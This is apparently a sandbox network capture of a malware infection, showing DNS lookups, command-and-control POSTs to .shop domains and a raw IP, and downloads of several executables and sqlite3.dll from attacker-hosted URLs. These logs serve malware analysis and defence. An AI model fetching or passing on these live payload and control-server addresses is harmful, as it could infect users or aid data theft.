POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ytptqebmxfvh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 281
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:55 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dhrgipmbhhsqcjj.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 308
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:55 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kggvstfddknnyj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 239
Host: selebration17io.io
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sjfrkwrmbilxea.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 125
Host: selebration17io.io
DNS

120.85.215.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

120.85.215.91.in-addr.arpa

IN PTR

Response
DNS

119.110.54.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

119.110.54.20.in-addr.arpa

IN PTR

Response
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR

Response

18.134.221.88.in-addr.arpa

IN PTR

a88-221-134-18deploystaticakamaitechnologiescom
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418548_1UEU8RPM3S7H7G0D8&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418548_1UEU8RPM3S7H7G0D8&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 330528
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D466B3FC7CB74D6F918720C2A6EEF185 Ref B: LON04EDGE0620 Ref C: 2024-03-17T02:18:00Z
date: Sun, 17 Mar 2024 02:17:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301208_1A8N3XLBQPT0ST5XU&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301208_1A8N3XLBQPT0ST5XU&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 470295
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 96C2005991E849DFA39725867B784E74 Ref B: LON04EDGE0620 Ref C: 2024-03-17T02:18:00Z
date: Sun, 17 Mar 2024 02:17:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388050_13LHMV8LNZUBG68MF&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339388050_13LHMV8LNZUBG68MF&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 274584
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8BC4B477CCC846A3ABCFAEB6DB358706 Ref B: LON04EDGE0620 Ref C: 2024-03-17T02:18:00Z
date: Sun, 17 Mar 2024 02:17:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388051_1DI9F3V3Y6K7A0KMB&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339388051_1DI9F3V3Y6K7A0KMB&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 134896
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 50BB28E495694849B0C48B27B06E851E Ref B: LON04EDGE0620 Ref C: 2024-03-17T02:18:00Z
date: Sun, 17 Mar 2024 02:17:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418547_1N5DXBL93QHFGMSRD&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418547_1N5DXBL93QHFGMSRD&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 527118
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DC8BE368795B4CEB8E5BD8C54C6568A6 Ref B: LON04EDGE0620 Ref C: 2024-03-17T02:18:00Z
date: Sun, 17 Mar 2024 02:17:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301617_1V543CFQPAISNVZHR&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301617_1V543CFQPAISNVZHR&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 126415
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 72E4799B07B846C8A8094C09A21FC2E8 Ref B: LON04EDGE0620 Ref C: 2024-03-17T02:18:01Z
date: Sun, 17 Mar 2024 02:18:00 GMT
DNS

174.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

174.178.17.96.in-addr.arpa

IN PTR

Response

174.178.17.96.in-addr.arpa

IN PTR

a96-17-178-174deploystaticakamaitechnologiescom
DNS

211.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.135.221.88.in-addr.arpa

IN PTR

Response

211.135.221.88.in-addr.arpa

IN PTR

a88-221-135-211deploystaticakamaitechnologiescom
DNS

209.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.178.17.96.in-addr.arpa

IN PTR

Response

209.178.17.96.in-addr.arpa

IN PTR

a96-17-178-209deploystaticakamaitechnologiescom
DNS

209.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.178.17.96.in-addr.arpa

IN PTR

Response

209.178.17.96.in-addr.arpa

IN PTR

a96-17-178-209deploystaticakamaitechnologiescom
GET

http://185.172.128.19/288c47bbc1871b439df19ff4df68f00076.exe

Remote address:

185.172.128.19:80

Request

GET /288c47bbc1871b439df19ff4df68f00076.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.172.128.19

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 6547456
Last-Modified: Thu, 14 Mar 2024 06:43:41 GMT
Connection: keep-alive
ETag: "65f29c9d-63e800"
Accept-Ranges: bytes
DNS

19.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.128.172.185.in-addr.arpa

IN PTR

Response
DNS

19.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.128.172.185.in-addr.arpa

IN PTR
DNS

19.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.128.172.185.in-addr.arpa

IN PTR
DNS

trmpc.com

Remote address:

8.8.8.8:53

Request

trmpc.com

IN A

Response

trmpc.com

IN A

211.171.233.126

trmpc.com

IN A

196.188.169.138

trmpc.com

IN A

175.120.254.9

trmpc.com

IN A

190.220.21.28

trmpc.com

IN A

181.26.199.14

trmpc.com

IN A

186.147.159.149

trmpc.com

IN A

109.98.58.98

trmpc.com

IN A

109.175.29.39

trmpc.com

IN A

190.13.174.90

trmpc.com

IN A

187.134.63.219
DNS

trmpc.com

Remote address:

8.8.8.8:53

Request

trmpc.com

IN A

Response

trmpc.com

IN A

181.26.199.14

trmpc.com

IN A

186.147.159.149

trmpc.com

IN A

109.98.58.98

trmpc.com

IN A

109.175.29.39

trmpc.com

IN A

190.13.174.90

trmpc.com

IN A

187.134.63.219

trmpc.com

IN A

211.171.233.126

trmpc.com

IN A

196.188.169.138

trmpc.com

IN A

175.120.254.9

trmpc.com

IN A

190.220.21.28
GET

http://trmpc.com/check/index.php

Remote address:

211.171.233.126:80

Request

GET /check/index.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: trmpc.com

Response

HTTP/1.1 200 OK

Server: nginx/1.24.0
Date: Sun, 17 Mar 2024 02:18:43 GMT
Content-Type: application/octet-stream
Connection: close
Content-Description: File Transfer
Content-Disposition: attachment; filename=1a042d6e.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
DNS

herdbescuitinjurywu.shop

MsBuild.exe

Remote address:

8.8.8.8:53

Request

herdbescuitinjurywu.shop

IN A

Response

herdbescuitinjurywu.shop

IN A

172.67.206.194

herdbescuitinjurywu.shop

IN A

104.21.69.91
POST

https://herdbescuitinjurywu.shop/api

MsBuild.exe

Remote address:

172.67.206.194:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: herdbescuitinjurywu.shop

Response

HTTP/1.1 200 OK

Date: Sun, 17 Mar 2024 02:18:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=56vvpnsmui9f6pc0eedjhq9vtn; expires=Wed, 10-Jul-2024 20:05:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRkB4aBba7CEJ9BKcwAf60S8qLXkKSs4x42XQGLZF%2BP0Ds5kvubCtQZRBVqWtKOnjDn5G5GxXB63t09IFHPY%2BfWzqKSG%2Fiob68Zo5uPBANEUFmnzGSiPPVLP4qN4XOr5gma9PLbag30454c%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86597e77ad8279ae-LHR
alt-svc: h3=":443"; ma=86400
DNS

194.206.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.206.67.172.in-addr.arpa

IN PTR

Response
DNS

194.206.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.206.67.172.in-addr.arpa

IN PTR

Response
DNS

126.233.171.211.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.233.171.211.in-addr.arpa

IN PTR

Response
DNS

126.233.171.211.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.233.171.211.in-addr.arpa

IN PTR

Response
DNS

wisemassiveharmonious.shop

MsBuild.exe

Remote address:

8.8.8.8:53

Request

wisemassiveharmonious.shop

IN A

Response
DNS

wisemassiveharmonious.shop

MsBuild.exe

Remote address:

8.8.8.8:53

Request

wisemassiveharmonious.shop

IN A

Response
DNS

colorfulequalugliess.shop

MsBuild.exe

Remote address:

8.8.8.8:53

Request

colorfulequalugliess.shop

IN A

Response

colorfulequalugliess.shop

IN A

172.67.185.152

colorfulequalugliess.shop

IN A

104.21.19.68
DNS

colorfulequalugliess.shop

MsBuild.exe

Remote address:

8.8.8.8:53

Request

colorfulequalugliess.shop

IN A

Response

colorfulequalugliess.shop

IN A

172.67.185.152

colorfulequalugliess.shop

IN A

104.21.19.68
POST

https://colorfulequalugliess.shop/api

MsBuild.exe

Remote address:

172.67.185.152:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: colorfulequalugliess.shop

Response

HTTP/1.1 200 OK

Date: Sun, 17 Mar 2024 02:18:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rac1DdAhMG6G3dGswatSo77DCZBBJb%2Bcz3E7UWwc3MBMoOp749qXdJM6uvz7RK%2BkMJWC4sj7yKjGP3o%2BlIveOtTfTlu2xSgCeaG%2BPTanz7wYn9eSFu3PxLOTeCxmanLJARDucHMS1%2FX5FYFD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86597e7ebcc7414d-LHR
POST

https://colorfulequalugliess.shop/api

MsBuild.exe

Remote address:

172.67.185.152:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=10QPZ2yArorWSxgJ.UtL..5HN3KtarTHVrpiQhb6W8g-1710641924-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 49
Host: colorfulequalugliess.shop

Response

HTTP/1.1 200 OK

Date: Sun, 17 Mar 2024 02:18:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=kr488i1jsvm51dgf0tq13dfu36; expires=Wed, 10-Jul-2024 20:05:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYrD0manOpr8mr52withmRN2BBBWMn4cvu354Ts0JrwoA5sj9QiggIM9w4QB7%2BFnxD3OanRhkaXImj5r2pS6GVKeog3VnliqganahDu9GbHDjQL76PKlLWfQVS64mfnPGlnkuXFKtJjoz0y2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86597e80fe6c414d-LHR
alt-svc: h3=":443"; ma=86400
DNS

152.185.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

152.185.67.172.in-addr.arpa

IN PTR

Response
DNS

152.185.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

152.185.67.172.in-addr.arpa

IN PTR

Response
DNS

slim.dofuly.info

Remote address:

8.8.8.8:53

Request

slim.dofuly.info

IN A

Response

slim.dofuly.info

IN A

172.67.221.14

slim.dofuly.info

IN A

104.21.62.68
DNS

slim.dofuly.info

Remote address:

8.8.8.8:53

Request

slim.dofuly.info

IN A

Response

slim.dofuly.info

IN A

172.67.221.14

slim.dofuly.info

IN A

104.21.62.68
GET

http://slim.dofuly.info/data/pdf/may.exe

Remote address:

172.67.221.14:80

Request

GET /data/pdf/may.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: slim.dofuly.info

Response

HTTP/1.1 200 OK

Date: Sun, 17 Mar 2024 02:18:49 GMT
Content-Type: application/octet-stream
Content-Length: 2456625
Connection: keep-alive
Content-Description: File Transfer
Content-Disposition: attachment; filename=may.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BuxFgExLWl4KyPf9GIxzyyP2BIkV5CB%2F0TCqjW%2F0owYl1nvQ2JZTbzqroCKBnzgSKKnsOloEQJNR0q1sfxzcnFI2ibfcne%2FYEwQgzpiPmYTh8OPao5y9T%2Bo91uIrUAuuwo%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86597e9dfbb352cf-LHR
alt-svc: h3=":443"; ma=86400
GET

http://185.172.128.90/cpa/ping.php?substr=four&s=ab&sub=0

InstallSetup_four.exe

Remote address:

185.172.128.90:80

Request

GET /cpa/ping.php?substr=four&s=ab&sub=0 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.161 Safari/537.36

Response

HTTP/1.1 200 OK

Date: Sun, 17 Mar 2024 02:18:50 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8
GET

http://185.172.128.187/syncUpd.exe

InstallSetup_four.exe

Remote address:

185.172.128.187:80

Request

GET /syncUpd.exe HTTP/1.1
Host: 185.172.128.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.161 Safari/537.36

Response

HTTP/1.1 200 OK

Date: Sun, 17 Mar 2024 02:18:51 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 17 Mar 2024 02:15:01 GMT
ETag: "3be00-613d1cef6b5a5"
Accept-Ranges: bytes
Content-Length: 245248
Content-Type: application/x-msdos-program
DNS

90.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.128.172.185.in-addr.arpa

IN PTR

Response
DNS

90.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.128.172.185.in-addr.arpa

IN PTR

Response
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
DNS

187.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.128.172.185.in-addr.arpa

IN PTR

Response
DNS

187.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.128.172.185.in-addr.arpa

IN PTR

Response
GET

http://185.172.128.187/ping.php?substr=four

InstallSetup_four.exe

Remote address:

185.172.128.187:80

Request

GET /ping.php?substr=four HTTP/1.1
Host: 185.172.128.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.161 Safari/537.36

Response

HTTP/1.1 200 OK

Date: Sun, 17 Mar 2024 02:19:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
GET

http://185.172.128.126/BroomSetup.exe

InstallSetup_four.exe

Remote address:

185.172.128.126:80

Request

GET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.161 Safari/537.36

Response

HTTP/1.1 200 OK

Date: Sun, 17 Mar 2024 02:19:02 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 26 May 2020 02:37:26 GMT
ETag: "1be800-5a683f9d58580"
Accept-Ranges: bytes
Content-Length: 1828864
Content-Type: application/x-msdos-program
DNS

126.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.128.172.185.in-addr.arpa

IN PTR

Response
DNS

126.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.128.172.185.in-addr.arpa

IN PTR

Response
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC
Host: 185.172.128.145
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECF
Host: 185.172.128.145
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1520
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDB
Host: 185.172.128.145
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5416
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCG
Host: 185.172.128.145
Content-Length: 5031
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
GET

http://185.172.128.145/15f649199f40275b/sqlite3.dll

upk.0.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/sqlite3.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:08 GMT
Content-Type: application/x-msdos-program
Content-Length: 1106998
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHC
Host: 185.172.128.145
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

